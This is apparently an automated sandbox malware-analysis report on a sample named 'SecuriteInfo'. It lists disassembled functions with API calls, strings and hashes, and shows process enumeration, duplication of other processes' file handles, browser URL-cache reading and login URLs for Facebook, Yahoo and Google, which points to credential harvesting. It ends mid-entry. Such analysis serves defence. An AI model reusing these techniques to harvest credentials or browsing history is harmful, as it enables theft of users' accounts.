                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                              Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->580 601->596 602->592 604->583
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                              Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$ErrorLastfree
                                                              • String ID: |A
                                                              • API String ID: 77810686-1717621600
                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
